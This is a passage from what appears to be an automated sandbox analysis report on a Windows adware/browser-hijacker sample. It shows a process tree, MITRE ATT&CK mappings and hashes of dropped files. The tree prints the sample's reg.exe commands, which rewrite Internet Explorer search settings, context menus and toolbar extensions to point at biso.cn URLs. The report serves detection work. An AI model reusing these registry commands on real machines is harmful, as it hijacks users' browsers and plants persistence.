        
        PID:3656
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\China-World ╥¬╬┼" /v "" /d "http://www.biso.cn/js/menu.asp?menu=home" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:784
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Google ╚½─▄╦╤╦≈" /v "" /d "http://www.biso.cn/js/menu.asp?menu=search" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:3076
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■╧┬╘╪" /v "" /d "http://www.biso.cn/js/menu.asp?menu=soft" /f
        5⤵
        
        PID:1684
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Menuext\╥⌠╙░╙Θ└╓" /v "" /d "http://www.biso.cn/js/menu.asp?menu=media" /f
        5⤵
        
        PID:3496
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search" /v "CustomizeSearch" /d "http://www.biso.cn/google.asp" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1028
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search" /v "SearchAssistant" /d "http://www.biso.cn/google.asp" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2836
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1848
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╨┬╬┼╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3616
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3228
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "default Icon" /d "C:\Windows\System32\shell32.dll,14" /f
        5⤵
        
        PID:5088
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,14" /f
        5⤵
        
        PID:4712
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,14" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1548
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2964
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╨┬╬┼╫╩╤╢" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3828
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=1" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3232
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "╣·─┌╣·╝╩╨┬╬┼" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:2388
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "╣·─┌╣·╝╩╨┬╬┼" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4488
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4020
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1708
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2284
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,15" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3804
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,15" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3336
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,15" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4004
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3152
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1116
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=2" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3944
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        
        PID:2348
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "▒Ω╫╝╦╤╦≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3676
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:956
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "│ú╙├╚φ╝■" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1540
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2748
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,47" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:5116
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,47" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4228
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,47" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4292
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3444
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "│ú╙├╚φ╝■" /f
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=3" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4768
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "│ú╙├╚φ╝■╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4772
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "│ú╙├╚φ╝■╧┬╘╪" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:2580
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:712
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:3244
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        
        PID:4204
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,40" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4352
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,40" /f
        5⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,40" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4064
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3280
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:724
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=4" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4576
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4416
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b04A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "▓╞╛¡╞╡╡└" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3432
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1380
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2880
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        
        PID:2220
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,26" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2872
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,26" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1292
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,26" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:436
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:3964
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:3032
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=7" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2780
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b07A04EE-1114-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "╙╬╧╖╡╪┤°" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3200
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1640
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "FLASH▓Ñ╖┼╞≈╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:5044
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:2916
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Icon" /d "C:\Windows\System32\shell32.dll,28" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2712
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,28" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1920
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,28" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:5092
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
        5⤵
        Modifies Internet Explorer settings
        
        PID:1524
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "FLASH▓Ñ╖┼╞≈╧┬╘╪" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1572
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=8" /f
        5⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "FLASH▓Ñ╖┼╞≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:4084
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b08A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "FLASH▓Ñ╖┼╞≈" /f
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1980
- - C:\Users\Admin\AppData\Local\Temp\step$rewer2\pin.exe
    step$rewer2\pin.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pin.bat""
      4⤵
      Drops file in Drivers directory
      Suspicious use of WriteProcessMemory
      PID:2844
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 biso.cn
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type a.txt "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:784
    - - C:\Windows\SysWOW64\find.exe
        
        find "]"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3528 -ip 3528
1⤵
PID:4600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\exeABE0.tmp

Filesize
5KB

MD5
2780d99d2fa57fe9a7f6a67d72f1d0c1

SHA1
cc1606fef461f9009d5dade81479194e00004f25

SHA256
583929ffad2b2155886df2437e7def5017ddb8ac20e7d6f11c0fc0d70c939384

SHA512
ae960a1da0d04942e3cf996dd3832102940e7fd60db00dc3038025e0f2001928e8e418d800d5446cf081c06c7ac72c218a649002759272e8dc54dad8fe88daf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\exeAC0F.tmp

Filesize
4KB

MD5
c3827f7d45217d1afd303c80f8acd309

SHA1
b778e0c93417d1ed33d6b485fa0ba0e1cdc69b8a

SHA256
6d3f7e9ed1a453e677b584e96fecf16d8e6452ed21d14ce28944cefbd7b1f8ab

SHA512
eda00485226adddfd0420a6ae6d9d18d34ac9f4cb4a9db2cb8decc72f3cf459a6cec6440a8cfd7ac194b61a4220a6915cbb5199c1f345c9d88aaf334a0f637a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.bat

Filesize
17KB

MD5
6ef5c2ade68f71f685ca890a34a60586

SHA1
f505dd49e196e1f73947f94d03a42802b41d20ed

SHA256
bc411e7f4efce83d4650cf38ec1a8898d88b22fa8ebae83e94b8993426a009fd

SHA512
8e4275350663dcf51b26558b8aaff80d64475b538eaecd68615f8233d532e55423f19cab1d65e98be6434e35c556184390852c832ce48a9adb61ee0096d265b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.exe

Filesize
32KB

MD5
6b6be2d62540b060a0c4a4fb22612840

SHA1
cdc2167c97ea8e2f3645507eede6eca68af5fe54

SHA256
46fb14ef8aa5af9764ee17c3df3faa18763938c4c5f686b6311d01f5403c7b44

SHA512
d057d1097a33274df644185c28ec2ff5ff9ecb2c58ecc31d5ea0ea6bba999d67ccf218171d5f64db8678e926c697cd53ef6659d59f0a1c53def377008a6acee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pin.bat

Filesize
2KB

MD5
6723dba4e50ef550d3aa7ecebfac3d36

SHA1
9b599512e702aecbd809a358be2b04080d3aeedd

SHA256
90c5e66691b6d85ae2f8501d98fd12142bbedc93f51a7d2e70a58cb8adc579c3

SHA512
c017c26fefaad9f82970faa83fe2123da1e9c34c7116a6273156729df1e47d51527258887738610b4b72234f6651afedb791e9a07c96107aaed46faa75247944

Download Submit
C:\Users\Admin\AppData\Local\Temp\pin.exe

Filesize
21KB

MD5
42ac48f950c0d7efd4dd2b4a4495d0b8

SHA1
14cdd93debecd50f58428f6b99b3292c47075fe9

SHA256
4d4d3c96a666de028c3f15528f1784e298b5ea448c6409014622f120af272754

SHA512
4f0d088d8efd7f9b274ab35355d475c30759fa9d52ed4c2741266bf66b2d0f6e3c2d67699a801292d2bd9982ea65a6f2936873d9a12725130ce2193a897c44a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\step$rewer2\a.txt

Filesize
178B

MD5
82d052557c2b000762548670722f107d

SHA1
e298f9a094c842b19efd70ab0f4468c69ee37f45

SHA256
47ee9e6291543abcb21602c2443ab7b1572b0be1cd2b2b8dbe053cb7c36c779e

SHA512
093ee624f95c8f4c44db6c5c106c1b905d46a7f0354a6f90dc09a7c85716c9a7c09d0f38de8f0f217504080ec349e1f9f700a120374f800cbe4bdb784ca48423

Download Submit
C:\Users\Admin\AppData\Local\Temp\z.bat

Filesize
604B

MD5
71e127e2f5f7d3b34b5db2ac20115978

SHA1
1c10dc0a799cffb9d246f5a99f36d341b4949c75

SHA256
838c489ee313ef2e7dbbc9ef358a883ac8c757447bae6b36f3a14b628f21bce2

SHA512
e8c201d080da91d0059745a4659a1dc1c4065aa402c44e58f36a24a87535eb73da2025050539cbf72be8c71185591063856b8b6838d785eb2665472391a7f121

Download Submit
C:\Users\Admin\AppData\Local\Temp\z.exe

Filesize
853KB

MD5
ea28909d8de71b83f37641f3475ccfa0

SHA1
e87d4313d603af2da6f185e1de01d2b8b2862a54

SHA256
b1e80474eb7ddc9db1e0f96d9bb7de7278df8f6c842a0b899008d069df31c5b2

SHA512
f77a9bac5eaee21b1a94221a631ded83a250f0c25493961e4d28b4da02bd72b73142404d806900e4ea20a7b71b0ea5ebf74d889d002e5d90adaf69fe64bef368

Download Submit
